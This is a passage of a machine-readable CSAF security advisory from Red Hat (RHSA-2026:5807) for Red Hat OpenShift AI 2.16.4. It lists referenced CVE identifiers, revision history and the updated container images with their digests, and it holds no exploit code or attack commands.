"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images are now available for Red Hat OpenShift AI.",
"title": "Topic"
},
{
"category": "general",
"text": "Release of RHOAI 2.16.4 provides these changes:",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5807",
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2024-25621",
"url": "https://access.redhat.com/security/cve/CVE-2024-25621"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-12060",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-12638",
"url": "https://access.redhat.com/security/cve/CVE-2025-12638"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-12816",
"url": "https://access.redhat.com/security/cve/CVE-2025-12816"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-6193",
"url": "https://access.redhat.com/security/cve/CVE-2025-6193"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-66031",
"url": "https://access.redhat.com/security/cve/CVE-2025-66031"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-66418",
"url": "https://access.redhat.com/security/cve/CVE-2025-66418"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-66626",
"url": "https://access.redhat.com/security/cve/CVE-2025-66626"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68156",
"url": "https://access.redhat.com/security/cve/CVE-2025-68156"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1526",
"url": "https://access.redhat.com/security/cve/CVE-2026-1526"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1528",
"url": "https://access.redhat.com/security/cve/CVE-2026-1528"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-2229",
"url": "https://access.redhat.com/security/cve/CVE-2026-2229"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25223",
"url": "https://access.redhat.com/security/cve/CVE-2026-25223"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-29074",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-32141",
"url": "https://access.redhat.com/security/cve/CVE-2026-32141"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5807.json"
}
],
"title": "Red Hat Security Advisory: RHOAI 2.16.4 - Red Hat OpenShift AI",
"tracking": {
"current_release_date": "2026-04-16T11:09:04+00:00",
"generator": {
"date": "2026-04-16T11:09:04+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5807",
"initial_release_date": "2026-03-25T12:32:51+00:00",
"revision_history": [
{
"date": "2026-03-25T12:32:51+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-25T12:33:18+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:04+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift AI 2.16",
"product": {
"name": "Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_ai:2.16::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift AI"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"product_id": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-codeflare-operator-rhel8@sha256%3Ab68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282100"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel8@sha256%3A022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282136"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-argoexec-rhel8@sha256%3Afd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282136"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256%3A4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774288148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-operator-controller-rhel8@sha256%3A64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282078"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kf-notebook-controller-rhel8@sha256%3Ab26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282201"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kuberay-operator-controller-rhel8@sha256%3A9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kueue-controller-rhel8@sha256%3Af38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282087"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-api-server-v2-rhel8@sha256%3Ac46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-driver-rhel8@sha256%3A0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-launcher-rhel8@sha256%3Ab82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282116"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256%3A9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282159"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256%3A87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mlmd-grpc-server-rhel8@sha256%3A07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774283932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mm-rest-proxy-rhel8@sha256%3Aace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282095"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel8@sha256%3Aa880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774286327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-operator-rhel8@sha256%3A8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-rhel8@sha256%3A14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282092"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-runtime-adapter-rhel8@sha256%3Aa291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774283191"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-serving-controller-rhel8@sha256%3Aae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-rhel8@sha256%3Aabdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282058"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"product_id": "registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-notebook-controller-rhel8@sha256%3Aaa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282170"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"product_id": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-operator-bundle@sha256%3A9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774296584"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"product_id": "registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel8-operator@sha256%3A2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774293140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-training-operator-rhel8@sha256%3A6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-operator-rhel8@sha256%3A297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774285579"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-rhel8@sha256%3A92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=1774282073"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64 as a component of Red Hat OpenShift AI 2.16",
